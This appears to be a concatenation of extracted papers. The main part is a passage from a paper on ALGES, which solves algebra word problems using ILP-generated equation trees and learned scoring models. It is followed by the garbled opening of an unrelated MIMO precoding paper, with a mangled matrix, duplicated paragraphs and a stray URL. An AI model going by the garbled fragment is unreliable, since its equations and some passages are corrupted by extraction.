an operator di postfix stack depth of ei; di ∈ [L] ti type of ei (corresponds to Qset entity); ti ∈ [q] Table 3: ILP notation for candidate equations model Variables. Integer variables x1,x2, . . . ,xL encode which symbol each ei refers to. Their domain, [m], represents the k numeric constants in the same order as their respective Qsets, followed by the k′ unknowns, and finally operators in the order +,−,∗,/,=. Binary variables ci,ui, and oi indicate whether ei is a numeric constant, unknown, or oper- ator, resp. Variables di with domain [L] equal the postfix stack depth of ei. Finally, variables ti with domain [q] indicate the type of ei. For j ∈ [n] , i.e., for the k constants and k′ unknowns, typej ∈ [q] denotes the respective Qset entity. Uncertainty in object types may be incorporated easily by treating typej as a (potentially weighted) subset of [q]. Constraints and Objective Function. Constraints in ILP(w) include syntactic validity, type consis- tency, and domain specific simplicity considera- tions. We describe them briefly here, leaving details to the Appendix. The objective function minimizes the sum of the weights of violated soft constraints. Below, (H) denotes hard constraints, (W) weighted soft constraints, and (P) post-processing steps. Definitional Constraints (H): Constraints over in- dicator variables ci,ui, and oi ensure they repre- sent their intended meaning, including the invariant ci + ui + oi = 1. For stack depth variables, we add d1 = 1 and di = di−1 −2oi + 1 for i > 1. Syntactic Validity (H): Validity of the postfix ex- pression is enforced easily through constraints o1 = 0 and dL = 1. In addition, we add xL = m and xi < m for i < L to ensure equality occurs exactly once and as the top-level operator. Operand Access (H): The second operand of an operator symbol ei is always ei−1. Its first operand, however, is defined instead by the stack-based eval- uation process. ILP(w) encodes it using an alterna- tive characterization: the first operand of ei is ej iff j ≤ i−2 and j is the largest index such that di = dj. Type Consistency (W): Suppose T1 and T2 are the types of the two operands of an operator o, whose type is To. Addition and subtraction preserve the type of their operands, i.e., if o is + or −, then To = T1 = T2. Multiplication inherits the type of one of its operands, and division inherits the type of its first operand. In both cases, the two operands must be of different types. Formally, if o is ∗, then To ∈ {T1,T2} and T1 6= T2; if o is /, then To = T1 6= T2. Domain Considerations (H,W): We add a few do- main specific constraints based on patterns observed in a small subset of the questions. These include an upper bound on the stack depth, which helps avoid overly complex expressions unsuitable for grade- school algebra, and reducing redundancy by, e.g., disallowing the numeric constant 0 to be an operand of + or − or the second operand of /. Symmetry Breaking (H,W): If a commutative op- erator is preceded by two numeric constants (e.g., ab+), we require the constants to respect their Qset ordering. Every other pair of constants that disre- spects its Qset ordering incurs a small penalty. Negative and Fractional Answers (P): Rather than imposing non-negativity as a complex constraint in ILP(w), we filter out candidate expressions yielding a negative answer as a post-processing step. Sim- ilarly, when all numeric constants are integers, we filter out expressions yielding a fractional answer, again based on typical questions in our datasets. 7 Learning Our goal is to learn a scoring function that identifies the best equation tree t∗ corresponding to an unseen word problem w. Since our dataset consists only of problem-solution pairs {(wi,`i)}i=1,...,N , train- ing our scoring models requires producing equa- tion trees matching `i. For every training in- stance (wi,`i), we use ILP(wi) to generate M type- consistent equation tree candidates Ti. To train our local model (section 7.1), we filter out trees from Ti that do not evaluate to `i, extract all (s1,s2,op) triples from the remaining trees, and use feature vec- tors capturing (s1,s2) and labeled with op as train- ing data (see Figure 2). For the global model, we use for training data a subset of Ti with an equal number of correct and incorrect equation trees (section 7.2). Once trained, we use Equation 1 to combine these models to compute a score for each candidate equa- tion tree generated for an unseen word problem at inference time (see Figure 3). 7.1 Local Qset Relationship Model We train a local model of a probability distribu- tion over the math operators that may be used to combine a pair of Qsets. The idea is to learn the correspondence between spans of texts and math op- erators by examining such texts and the Qsets of the involved operands. Given Qsets s1 and s2, the lo- cal scoring function scores the probability of each op ∈ {+,−,∗,/}, i.e., Llocal = θᵀflocal(s1,s2) where flocal is a feature vector for s1 and s2. Note that either Qset may be a compound (the result of a combine procedure). The goal is to learn parameters θ by maximizing the likelihood of the operators be- tween every two Qsets that we observe in the train- ing data. We model this as a multi-class SVM with an RBF kernel. Features. Given the richness of the textual possi- bilities for indicating a math operation, the features are designed over semantic and intertextual relation- ships between Qsets, as well as domain-specific lex- 1. Single Qset Features (repeated for B) • what argument of its governing verb is A? • is A a subset of another set? • is A a compound? • math keywords found in context of A • verb Lin distance from known verb categories (B only) 2. Relational features between Qsets A and B • entity match • adjective overlap • location match • distance in text • Lin similarity between verbs governing A and B • is one a subtype of the other? • does one contain the other? 3. Target Quantity features • A/B is target Qset • A/B entity matches target entity • math keywords in target context 4. Root node features • # of ILP constraints violated by equation • Scores of left and right subtrees of root Figure 4: Features used for local and global models, for left Qset A and right Qset B ical features. The feature vector includes three main feature categories (Table 4). First, single set features include syntactic and po- sitional features of individual Qsets. For example, they include indicator features for whether elements of a short lexicon of math-specific terms such as ‘add’ and ‘times’ appear in the vicinity of the set reference in the text. Also, following Hosseini et al. (2014), we include a vector that captures the dis- tance between the verbs associated with each Qset and a small collection of verbs found to be useful in categorizing arithmetic operations in that work, based upon their Lin Similarity (Lin, 1998). Second, relationships between Qsets are de- scribed w.r.t. various Qset properties described in section 4. These include binary features like whether one Qset’s container property matches the other Qset’s entity (a strong indicator of multiplication), or the distance between the verbs associated with each set based upon their Lin Similarity. Third, target quantity features check the matching between the target Qset and the current Qset as well as math keywords in the target sentence. 7.2 Global Equation Model We also train a global model that scores equation trees based on the global structure of the tree and the problem text. The global model scores the com- patibility of the tree with the soft constraints intro- duced in Section 6 as well as its correspondence with the problem text. We use a discriminative model: Gglobal = ψᵀfglobal(w,t) where fglobal are the fea- tures capturing trees and their correspondences with the problem text. We train a global classifier to relate these features through parameters ψ. Features fglobal are explained in Table 4. They include the number of violated soft constraints in the ILP, the probabilities of the left and right subtrees of the root as provided by the local model, and global lexical features. Additionally, the three local feature sets are applied to the left and right Qsets. 7.3 Inference For an unseen problem w, we first extract base Qsets from w. The goal is to find the most likely equation tree with minimum violation of hard and soft con- straints. Using ILP(w) over these Qsets, we gener- ate M candidate equation trees ordered by the sum of the weights of the constraints they violate. We compute the likelihood score given by Eqn. (1) for each candidate equation tree t, use this as an esti- mate of the likelihood p(t|w), and return the can- didate tree t∗ with the highest score. In Eqn. (1), the score of t is the product of the likelihood scores given by the local classifier for each operand in t and the Qsets over which it operates, multiplied by the likelihood score given by the global classifier for the correctness of t. If the resulting equation provides the correct answer for w, we consider inference suc- cessful. 8 Experiments This section reports on three experiments: a com- parison of ALGES with Kushman et al. (2014)’s template-based method, a comparison of ALGES with Hosseini et al. (2014)’s verb-categorization methods, and ablation studies. The experiments are complicated by the fact that ALGES is limited to sin- gle equations, and the verb categorization method can only handle single-equations without multipli- cation or division. Our main experimental result is to show an improvement over the template-based method on single-equation algebra word problems. We further show that the template-based method de- pends on lexical and template overlap between its training and test sets. When these overlaps are re- duced, the method’s accuracy drops sharply. In con- trast, ALGES is quite robust to changes in lexical and template overlap (see Tables 4 and 5). Experimental Setup. We use the Stanford De- pendency Parser in CoreNLP 3.4 (De Marneffe et al., 2006) to obtain syntactic information used for grounding and feature computation. For the ILP model, we use CPLEX 12.6.1 (IBM ILOG, 2014) to generate the top M = 100 equation trees with a maximum stack depth of 10, aborting exploration upon hitting 10K feasible solutions or 30 seconds.5 We use Python’s SymPy package for solving equa- tions for the unknown. For the local and global mod- els, we use the LIBSVM package to train SVM clas- sifiers (Chang and Lin, 2011) with RBF kernels that return likelihood estimates as the score. Dataset. This work deals with grade-school alge- bra word problems that map to single equations with varying length. Every equation may involve mul- tiple math operations including multiplication, di- vision, subtraction, and addition over non-negative rational numbers and one variable. The data is gathered from math-aids.com, k5learning. com, and ixl.com websites and a subset of the data from Kushman et al. (2014) that maps word problems to single equations. We refer to this dataset as SINGLEEQ (see Table 9 for example problems). The SINGLEEQ dataset consists of 508 problems, 1,117 sentences, and 15,292 words. Baselines. We compare our method with the template-based method (Kushman et al., 2014) and the verb-categorization method (Hosseini et al., 2014). For the template-based method, we use the fully supervised setting, providing equations for each training example. 8.1 Comparison with Template-based Method We first compare ALGES with the template-based method over SINGLEEQ. We evaluate both systems 5These hyper-parameters were chosen based on experimen- tation with a small subset of the questions. A more systematic choice may improve overall performance. Template Overlap 10.4 7.7 6.3 2.1 ALGES 0.72 0.66 0.66 0.63 Template-based 0.67 0.60 0.46 0.26 Error reduction 15% 15% 33% 50% Table 4: Decreasing template overlap: Accuracy of ALGES versus the template-based method on single- equation algebra word problems. The first column corre- sponds to the SINGLEEQ dataset, and the other columns are for subsets with decreasing template overlap. Lexical Overlap 4.3 3.3 2.6 2.5 ALGES 0.72 0.66 0.66 0.63 Template-based 0.67 0.60 0.46 0.26 Error reduction 15% 15% 33% 50% Table 5: Decreasing lexical overlap: Accuracy of ALGES versus the template-based method on single-equation al- gebra word problems. The first column corresponds to the SINGLEEQ dataset, and the other columns are for sub- sets with decreasing lexical overlap. on the number of correct answers provided and re- port the average of a 5-fold cross validation. ALGES achieves 72% accuracy whereas the template-based method achieves 67% accuracy, a 15% relative re- duction in errors (first columns in Tables 4 and 5). This result is statistically significant with a p-value of 0.018 under a paired t-test. Lexical Overlap. By further analyzing SINGLEEQ, we noted that there is substantial overlap between the content words (common noun, adjective, adverb, and verb lemmas) in different problems. For ex- ample, many problems ask for the total number of seashells collected by two people on a beach, with only the names of the people and the number of seashells that each found changed. To analyze the effect of this repetition on the learning methods eval- uated, we define a lexical overlap parameter as the total number of content words in a dataset divided by the number of unique content words. The two “seashell problems” have a high lexical overlap. Template Overlap. We also noted that many prob- lems in SINGLEEQ can be solved using the same template, or equation tree structure above the leaf nodes. For example, a problem which corresponds to the equation (9 ∗ 3) + 7 and a different problem that maps to (4 ∗ 5) + 2 share the same template. We introduce a template overlap parameter defined as the average number of problems with the same template in a dataset. Results. In our data, template overlap and lexi- cal overlap co-vary. To demonstrate the brittleness of the template-based method simply, we picked three subsets of SINGLEEQ where both parame- ters were substantially lower than in SINGLEEQ and recorded the relative performance of the template- based method and of ALGES in Tables 4 and 5. The data used in both tables is the same, but the ta- bles are separated for readability. The first column reports results for the SINGLEEQ dataset, and the other columns report results for the subsets with de- creasing template and lexical overlaps. The subsets consist of 254, 127, and 63 questions respectively. We see that as the lexical overlap drops from 4.3 to 2.5 and as the template overlap drops from 10.4 to 2.1, the relative advantage of ALGES over the tem- plate methods goes up from 15% to 50%. While the template-based method is able to solve a wider range of problems than ALGES, its accu- racy falls off significantly when faced with fewer re- peated templates or less spurious lexical overlap be- tween problems (from 0.67 to 0.26). The accuracy of ALGES also declines from 0.72 to 0.63 across the table, which needs to be investigated further. In future work, we also need to investigate additional settings for the two parameters and to attempt to “break” their co-variance. Nevertheless, we have uncovered an important brittleness in the template- based method and have shown that ALGES is sub- stantially more robust. 8.2 Comparison with Verb-Categorization The verb-categorization method learns to solve ad- dition and subtraction problems, while ALGES is ca- pable of solving multiplication and division prob- lems as well. We compare against their method over our dataset as well as the dataset provided by that work, here referred to as ADDSUB. ADDSUB consists of addition and subtraction word problems with the possibility of irrelevant distractor quanti- ties in the problem text. The verb categorization method uses rules for handling irrelevant informa- tion. An example rule is to remove a Qset whose ad- jective is not consistent with the adjective of the tar- get Qset. We augment ALGES with rules introduced in this method for handling irrelevant information in ADDSUB. Results, reported in Table 6, show comparable accuracy between both methods on Hosseini et al. (2014) data. Our method shows a significant im- provement versus theirs on the SINGLEEQ dataset due to the presence of multiplication and division operators, as 40% of the problems in our dataset in- clude these operators. Method ADDSUB SINGLEEQ ALGES 0.77 0.72 Verb-categorization 0.78 0.48 Error reduction - 53% Table 6: Accuracy of ALGES compared to verb catego- rization method. 8.3 Ablation Study In order to determine the effect of various compo- nents of our system on its overall performance, we perform the following ablations: No Local Model: Here, we test our method absent the local information (Section 7.1). That is, we gen- erate equations using all ILP constraints, and score trees solely on information provided by the global model: p(t|w) ∝Gglobal(w,t). No Global Model: Here, we test our method with- out the global information (Section 7.2). That is, we generate equations using only the hard constraints of ILP and score trees solely on information provided by the local model: p(t|w) ∝ ∏ ti∈tLlocal(w,ti). No Qset Reordering: We test our method without the deterministic Qset reordering rules outlined in Section 5. Instead, we allow the ILP to choose the top M equations regardless of order. Results in Table 7 show that each component of ALGES contributes to its overall performance on the SINGLEEQ corpus. We find that both the Global and Local models contribute significantly to the overall system, demonstrating the significance of a bottom- up approach to building equation trees. Importance of Features. We also evaluate the ac- curacy of the local Qset relationship model (Sec- Method Accuracy ALGES 0.72 No Local Model 0.50 No Global Model 0.49 No Qset Reordering 0.68 Table 7: Ablation study of each component of ALGES. Method Accuracy Local classifier: Full Feature set 0.84 No Single Set Features 0.81 No Set Relation Features 0.75 No Target Features 0.79 Table 8: Accuracy of local classifier in predicting the cor- rect operator between two Qsets and ablating feature sets. tion 7.1) on the task of predicting the correct op- erator for a pair of Qsets 〈s1,s2〉 over the SIN- GLEEQ dataset using a 5-fold cross validation. Ta- ble 8 shows the value of each feature group used in the local classifier, and thus the importance of details of the Qset representation. 8.4 Qualitative Examples and Error Analysis. Table 9 shows some examples of problems solved by our method. We analyzed 72 errors made by ALGES on the SINGLEEQ dataset. Table 10 summarizes five major categories of errors. Problems and equations Luke had 20 stickers. He bought 12 stickers from a store in the mall and got 20 stickers for his birthday. Then Luke gave 5 of the stickers to his sister and used 8 to decorate a greeting card. How many stickers does Luke have left? ((20 + ((12 + 20)−8))−5) = x Maggie bought 4 packs of red bouncy balls, 8 packs of yellow bouncy balls, and 4 packs of green bouncy balls. There were 10 bouncy balls in each package. How many bouncy balls did Maggie buy in all? x = (((4 + 8) + 4)∗10) Sam had 79 dollars to spend on 9 books. After buying them he had 16 dollars. How much did each book cost? 79 = ((9∗x) + 16) Fred loves trading cards. He bought 2 packs of football cards for $2.73 each, a pack of Pokemon cards for $4.01, and a deck of baseball cards for $8.95. How much did Fred spend on cards? ((2∗2.73) + (4.01 + 8.95)) = x Table 9: Examples of problems solved by ALGES to- gether with the returned equation. Parsing errors cause a wrong grounding into the Error type Example Parsing Issues (12%) Randy needs 53 cupcakes for a birthday party. He already has 7 chocolate cupcakes and 19 vanilla cupcakes. How many more cup- cakes should Randy buy? Grounding & Ordering (19%) There are 24 bicycles and 14 tricycles in the storage at Danny’s apartment building. Each bicycle has 2 wheels and each tricycle has 3 wheels. How many wheels are there in all? Semantic Limitation (19%) The sum of three consecutive even numbers is 162. What is the smallest of these numbers? Lack of Knowledge (32%) A restaurant sold 63 hamburgers last week. How many hamburgers on average were sold each day? Inferring quantities (18%) Sara, Keith, Benny, and Alyssa each have 96 baseball cards. How many dozen baseball cards do they have in all? Table 10: Examples of different error categories and rel- ative frequencies. Sources of errors are underlined. designed representation. For example, the parser treats ‘vanilla’ as a noun modified by the number ‘19’, leading our system to treat ‘vanilla’ as the en- tity of a Qset rather than ‘cupcake’. Despite the improvements that come from ALGES, a portion of errors are attributed to grounding and ordering is- sues. For instance, the system fails to correctly dis- tinguish between the sets of wheels, and so does not get the movement-triggering container relationships right. Semantic limitations are another source of er- rors. For example, ALGES does not model the se- mantics of ‘three consecutive numbers’. The fourth category refers to errors caused due to lack of world knowledge (e.g., ‘week’ corresponds to ‘7 days’). Finally, ALGES is not able to infer quantities when they are not explicitly mentioned in the text. For ex- ample, the number of people should be inferred by counting the proper names in the problem. 9 Conclusion In this work we have outlined a method for solv- ing grade school algebra word problems. We have empirically demonstrated the value of our approach versus state-of-the-art word problem solving tech- niques. Our method grounds quantity references, utilizes type-consistency constraints to prune the search space, learns which algebraic operators are indicated by text, and ranks equations according to a global objective function. ALGES is a hybrid of pre- vious template-based and verb categorization state- based methods for solving such problems. By learn- ing correspondences between text and mathematical operators, we extend the method of state updates based on verb categories. By learning to re-rank equation trees using a global likelihood model, we extend the method of mapping word problems to equation templates. Different components of ALGES can be adapted to other domains of language grounding that re- quire cross-sentence reasoning. Future work in- volves extending ALGES to solve higher grade math word problems including simultaneous equations. This can be accomplished by extending the vari- able grounding step to allow multiple variables, and training the global equation model to recog- nize which quantities belong to which equation. The code and data for ALGES are publicly available. Acknowledgments: This research was supported by the Allen Institute for AI (66-9175), Allen Distinguished Investigator Award, and NSF (IIS- 1352249). We thank Regina Barzilay, Luke Zettle- moyer, Aria Haghighi, Mark Hopkins, Ali Farhadi, and the anonymous reviewers for their helpful com- ments. References Yoav Artzi and Luke Zettlemoyer. 2013. Weakly su- pervised learning of semantic parsers for mapping in- structions to actions. TACL, 1(1):49–62. Jonathan Berant, Vivek Srikumar, Pei-Chun Chen, Abby Vander Linden, Brittany Harding, Brad Huang, Peter Clark, and Christopher D. Manning. 2014. Modeling biological processes for reading comprehen- sion. In EMNLP. Antoine Bordes, Nicolas Usunier, and Jason Weston. 2010. Label ranking under ambiguous supervision for learning semantic correspondences. In ICML, pages 103–110. S. R. K. Branavan, Harr Chen, Luke Zettlemoyer, and Regina Barzilay. 2009. Reinforcement learning for mapping instructions to actions. In ACL/AFNLP, pages 82–90. Chih-Chung Chang and Chih-Jen Lin. 2011. LIBSVM: A library for support vector machines. ACM Transac- tions on Intelligent Systems and Technology, 2:27:1– 27:27. David L. Chen, Joohyun Kim, and Raymond J. Mooney. 2010. Training a multilingual sportscaster: Using per- ceptual context to learn language. JAIR, 37:397–435. Michael Collins. 2005. Discriminative reranking for natural language parsing. Computational Linguistics, 31(1):25–70. Marie-Catherine De Marneffe, Bill MacCartney, Christo- pher D Manning, et al. 2006. Generating typed de- pendency parses from phrase structure parses. In Pro- ceedings of LREC, volume 6, pages 449–454. Yansong Feng and Mirella Lapata. 2010. How many words is a picture worth? automatic caption generation for news images. In ACL, pages 1239–1249. Ruifang Ge and Raymond J Mooney. 2005. A statisti- cal semantic parser that integrates syntax and seman- tics. In Conference on Computational Natural Lan- guage Learning, pages 9–16. Ruifang Ge and Raymond J. Mooney. 2006. Discrimina- tive reranking for semantic parsing. In ACL. D. Goldwasser and D. Roth. 2011. Learning from natural instructions. In IJCAI. Hannaneh Hajishirzi, Julia Hockenmaier, Erik T. Mueller, and Eyal Amir. 2011. Reasoning about robocup soccer narratives. In UAI, pages 291–300. Hannaneh Hajishirzi, Mohammad Rastegari, Ali Farhadi, and Jessica K Hodgins. 2012. Semantic understand- ing of professional soccer commentaries. In UAI. Ben Hixon, Peter Clark, and Hannaneh Hajishirzi. 2015. Learning knowledge graphs for question answering through conversational dialog. In NAACL. Mohammad Javad Hosseini, Hannaneh Hajishirzi, Oren Etzioni, and Nate Kushman. 2014. Learning to solve arithmetic word problems with verb categorization. In EMNLP, pages 523–533. IBM ILOG. 2014. IBM ILOG CPLEX Optimization Studio 12.6. R Koncel-Kedziorski, Hannaneh Hajishirzi, and Ali Farhadi. 2014. Multi-resolution language grounding with weak supervision. In EMNLP. Nate Kushman, Yoav Artzi, Luke Zettlemoyer, and Regina Barzilay. 2014. Learning to automatically solve algebra word problems. In ACL, pages 271–281. Tom Kwiatkowski, Luke Zettlemoyer, Sharon Goldwater, and Mark Steedman. 2010. Inducing probabilistic ccg grammars from logical form with higher-order unifica- tion. In EMNLP, pages 1223–1233. Percy Liang, Michael I. Jordan, and Dan Klein. 2009. Learning semantic correspondences with less supervi- sion. In ACL/AFNLP, pages 91–99. Dekang Lin. 1998. An information-theoretic definition of similarity. In ICML, volume 98, pages 296–304. Fei Liu, Jeffrey Flanigan, Sam Thomson, Norman Sadeh, and Noah A. Smith. 2015. Toward abstractive sum- marization using semantic representations. In NAACL. Cynthia Matuszek, Evan Herbst, Luke Zettlemoyer, and Dieter Fox. 2012. Learning to parse natural lan- guage commands to a robot control system. In Proc. of the 13th International Symposium on Experimental Robotics (ISER), June. Arindam Mitra and Chitta Baral. 2015. Learning to au- tomatically solve logic grid puzzles. In EMNLP. D. Roth and W. Yih. 2004. A linear programming formu- lation for global inference in natural language tasks. In Hwee Tou Ng and Ellen Riloff, editors, CoNLL, pages 1–8. Association for Computational Linguistics. Subhro Roy, Urbana Champaign, and Dan Roth. 2015a. Solving general arithmetic word problems. In EMNLP. Subhro Roy, Tim Vieira, and Dan Roth. 2015b. Reason- ing about quantities in natural language. TACL. Min Joon Seo, Hannaneh Hajishirzi, Ali Farhadi, and Oren Etzioni. 2014. Diagram understanding in ge- ometry questions. In AAAI. Minjoon Seo, Hannaneh Hajishirzi, Ali Farhadi, Oren Et- zioni, and Clint Malcolm. 2015. Solving geometry problems: Combining text and diagram interpretation. In EMNLP. Shuming Shi, Yuehui Wang, Chin-Yew Lin, Xiaojiang Liu, and Yong Rui. 2015. Automatically solving num- ber word problems by semantic parsing and reasoning. In EMNLP. V. Srikumar and D. Roth. 2011. A joint model for ex- tended semantic role labeling. In EMNLP, Edinburgh, Scotland. Mark Yatskar, Lucy Vanderwende, and Luke Zettle- moyer. 2014. See no evil, say no evil: Description generation from densely labeled images. Lexical and Computational Semantics (* SEM 2014), page 110. John M Zelle and Raymond J Mooney. 1996. Learn- ing to parse database queries using inductive logic pro- gramming. In AAAI, pages 1050–1055. Luke S. Zettlemoyer and Michael Collins. 2005. Learn- ing to map sentences to logical form: Structured clas- sification with probabilistic categorial grammars. In UAI, pages 658–666. Lipu Zhou, Shuaixiang Dai, and Liwei Chen. 2015. Learn to solve algebra word problems using quadratic programming. In EMNLP. Appendix: ILP Model Details Figure 5 summarizes various constraints of our ILP model for generating candidate equations. op1 idxi is an auxilary variable whose value, when xi is an op- erator, is the index in the postfix expression of the first operand of xi. If op1 idxi = j, auxiliary vari- ables op1xi ,op1 t i,op1 o i , and op1 u i mirror xj, tj,oj, and uj, respectively. se denotes the corresponding constant or operator symbol e (e.g., ‘+’, ‘=’, ‘0’, etc.) in the postfix expression being constructed. H and W, as before, represent hard and weighted soft constraints. Definitional Constraints (H) : ci = I(xi ≤ k), i ∈ [L] oi = I(xi > n), i ∈ [L] ci + ui + oi = 1, i ∈ [L] d1 = 1; di = di−1 −2oi + 1, 2 ≤ i ≤ L op1 idx i = max j≤i−2 {j | dj = di}, 3 ≤ i ≤ L I(op1 idxi = j) ⇒ I(op1 x i = xj), I(op1 t i = tj), I(op1 oi = oj), I(op1 u i = uj), i, j ∈ [L] I(xi = j) ⇒ I(ti = typej), i ∈ [L], j ∈ [q] o1 = 0; dL = 1, Postfix validity (H) xL = m; xi < m, 1 ≤ i < L, Equation tree structure (H) I(xi = xj) ≤ oi, 1 ≤ i < j < L, Single use of constants (H) ci ⇒ I(xi < xj), 1 ≤ i < j < L, Perserve text ordering (W)∑ i∈L ui = 1, Single unknown (H) Type consistency (W) : I(xi ∈{s+, s−}) ⇒ I(ti = ti−1 = op1 ti), i ∈ [L] I(xi = s∗) ⇒ I(ti ∈{ti−1, op1 ti}), i ∈ [L] I(xi = s/) ⇒ I(ti = op1 t i), i ∈ [L] I(xi ∈{s∗, s/}) ⇒ I(ti−1 6= op1ti), i ∈ [L] Non-redundancy (H), Symmetry breaking (H) : I(xi ∈{s+, s−}) ⇒ I(xi−1 6= s0, op1 xi 6= s0), i ∈ [L] I(xi = s/ ⇒ I(xi−1 6∈ {s0, s1}), i ∈ [L] I(xi ∈{s+, s−}, ci−1 = ci−2 = 1) ⇒ I(xi−2 < xi−1), 3 ≤ i ≤ L Simplicity (H), Equality/Unknown first or last (W) : di ≤ maxStackDepth, i ∈ [L] op1 o L + oL−1,≤ 1 uL−1 + I(u1 = 1,∀i ∈{2, . . . , L−1} : di ≥ 2) ≥ 1 Equality next to unknown (W) : I(xi = s=) ≤ ui−1 + op1 ui , 3 ≤ i ≤ L Figure 5: ILP model for generating candidate equations work_7ohmgws75fcdhfv77ad7lvpszu ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-007 61 Multi Antenna Precoding Algorithm Based on M Spread Spectrum Sun Ruihua College of Information Engineering North China University of Science and Technology Tangshan, Hebei, China e-mail: 18712850210@163.com An Yongli* College of Information Engineering, North China University of Science and Technology Tangshan, Hebei, 063009, China *Corresponding Author tongxinayl@126.com Bai Junying College of Information Engineering North China University of Science and Technology Tangshan, Hebei, China e-mail: 15100586578@163.com Abstract—MIMO multi antenna technology can increase the capacity and channel utilization of the communication system without increasing the bandwidth, and become the key technology in the new generation of mobile communication system. However, each channel has its own channel parameters, so in the process of signal transmission, the influence of channel parameters should be considered. When the signal is received, it needs to be restored, which leads to the complexity of the receiving signal. Therefore, this paper proposes a multi antenna precoding algorithm based on M spread spectrum, precoding before sending signal spread spectrum to simplify the signal receiving equipment, and verify the feasibility of the algorithm through system error rate. Keywords-MIMO; Multi Antenna Technology; Mobile Communication; Spread Spectrum; Precoding I. INTRODUCTION With the rapid popularization of the practical application of wireless communication system, the number of wireless communication users and user service demand have increased exponentially, but the radio spectrum resources which can be used in wireless communication services are extremely limited. The contradiction between the increasing demand of wireless service and the limited radio spectrum resources is becoming more and more prominent. MIMO multi antenna technology is a new type of wireless communication technology developed under this background. Multi antenna [1] can effectively improve the channel capacity and is widely used. Multi antenna technology can make full use of space resources to achieve multiple and multi harvest. Without increasing the spectrum resources and transmitting power of the antenna, it can increase the capacity of the system channel, and has obvious advantages in many technologies. It is regarded as the core technology of the next generation mobile communication. However, the influence of channel parameters on receiver terminals can not be ignored in signal transmission. Therefore, a precoding algorithm based on M spread spectrum is proposed, which is pre processed before sending signals. In order to achieve the purpose of simplifying the receiving device. II. MULTI ANTENNA MIMO SYSTEM A. Multi Antenna MIMO System Model MIMO multi antenna technology is a major breakthrough in antenna technology in the field of wireless mobile communication. In theory, it can improve the system capacity and frequency efficiency without increasing the time and frequency. Its concept is very simple. It needs a transmitter and a receiver that have multiple antennas to carry out signal transmission simultaneously, so that a wireless MIMO system can be formed. Figure 1 is a schematic block diagram of the MIMO system: Figure 1. MIMO system schematic diagram The transmitter mapped the data signal sent by the space- time map to multiple antennas and sent them out. The receiver sent the signals received by all the antennas to the space-time decoding to restore the data signals sent by the transmitting terminal. According to the difference of space- time mapping, MIMO technology can be roughly divided into two categories: spatial diversity and spatial multiplexing. Spatial diversity refers to the use of multiple transmission antennas to send signals with the same information through different paths, and at the same time, multiple independent fading signals of the same data symbol are obtained at the receiver end, thus obtaining the reliability of the diversity mailto:1306067278@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 62 enhancement. For example, in the slow Rayleigh fading channel, using a transmitting antenna, the N root receiving antenna sends signals through N different paths. If the fading between antennas is independent, the maximum diversity gain can be N. For transmitter diversity technology, the gain of multiple paths is also used to improve the reliability of the system. In a system with the N root receiving antenna with the M root transmitting antenna, the maximum diversity gain of M*N can be obtained if the path gain between the antenna pairs is an independent uniform distribution of Rayleigh fading. At present, the commonly used spatial diversity techniques in MIMO systems are Space Time Block Code (STBC) and beamforming technology. STBC is an important coding form based on transmit diversity, the most basic of which is the Alamouti design for two antennas. The signal model of MIMO multi antenna system:                                                            n n n x x x hhh hhh hhh r r r NtNtNrNtNrNr Nt Nt Nr       2 1 2 1 21 22221 11211 2 1  The matrix is r Hx n  , r is the received signal, H is the channel matrix, x is the transmit signal, and n is the noise signal. The transmitter mapped the data signal sent by the space- time map to multiple antennas and sent them out. The receiver sent the signals received by all the antennas to the space-time decoding to restore the data signals sent by the transmitting terminal. According to the difference of space- time mapping, MIMO technology can be roughly divided into two categories: spatial diversity and spatial multiplexing. Spatial diversity refers to the use of multiple transmission antennas to send signals with the same information through different paths, and at the same time, multiple independent fading signals of the same data symbol are obtained at the receiver end, thus obtaining the reliability of the diversity enhancement. Spatial multiplexing technology uses multiple antennas to transmit independent data at the same time, thus increasing the data capacity of the system. For example, in the slow Rayleigh fading channel, using a transmitting antenna, N root receiving antennas sends signals through N different paths. If the fading between antennas is independent, the maximum diversity gain can be N. For transmitter diversity technology, the gain of multiple paths is also used to improve the reliability of the system. In a system with the N root receiving antennas and with the M root transmitting antennas, the maximum diversity gain of M*N can be obtained if the paths gain between the antenna pairs is an independent uniform distribution of Rayleigh fading. The diversity technique is mainly used to combat channel fading. Conversely, the fading characteristics of MIMO channels can provide additional channels to increase the degree of freedom in communication. In essence, if each fading between the transmit and receive antennas is independent, multiple parallel subchannels can be generated. If we transmit different information streams on these parallel sub channels, we can provide transmission data rate, which is called spatial multiplexing. According to the correspondence between sub data stream and antenna, the spatial multiplexing system can be roughly divided into three modes: D-BLAST, V-BLAST and T-BLAST. B. Main Teachnolody There are three main technologies in MIMO system: space multiplexing, transmission diversity and beamforming. 1) Space reuse: The system divides the data into multiple parts, and the system is transmitted on the multiple antennas at the transmitter. After receiving the mixed signals of multiple data, the parallel data streams are distinguished by the independent fading characteristics between different space channels. It achieves the purpose of obtaining higher data rate in the same frequency resource. 2) Transmission diversity technology: Taking the space time coding as the representative, the data stream is jointly encoded at the transmitter side to reduce the symbol error rate due to channel fading and noise. Space time coding increases the redundancy of the signal at the transmitter, so that the diversity gain is obtained at the receiver. At present, the commonly used spatial diversity techniques in MIMO systems are Space Time Block Code (STBC) and beamforming technology. STBC is an important coding form based on transmit diversity, the most basic of which is the Alamouti design for two antennas. 3) Beamforming: The system generates a directivity beam through multiple antennas, concentrating the signal energy in the direction of the desired transmission, thus improving the quality of the signal and reducing the interference to other users. Space reuse can maximize the average transmission rate of MIMO system, but only a limited diversity gain can be obtained. It may not be used in high order modulation, such as 16QAM, in the use of SNR. Wireless signals will be reflected frequently in dense urban areas, indoor coverage and other environments, making the fading characteristics of multiple spatial channels more independent, thus making the effect of space multiplexing more obvious. Wireless signals are less in the suburbs and in rural areas, and the correlation between different spatial channels is larger, so space reuse is therefore reused. Which effect is much worse. The extra diversity gain and coding gain can be obtained by space-time coding of the transmitted signal, so the high order modulation can be used in the wireless environment with relatively small SNR, but the rate bonus of the space parallel channel can not be obtained. Space coding technology also performs well in situations where wireless correlation is large. Beamforming technology can achieve better signal gain and interference suppression when it can acquire channel state information, so it is more suitable for TDD system. Beamforming is not suitable for dense urban areas, indoor coverage and other environments. Due to reflection, on the one hand, the receiver receives signals from too many http://fanyi.baidu.com/translate?aldtype=16047&query=W%E5%91%A8%E6%9C%9F&keyfrom=baidu&smartresult=dict&lang=auto2zh#zh/en/javascript:void(0); International Journal of Advanced 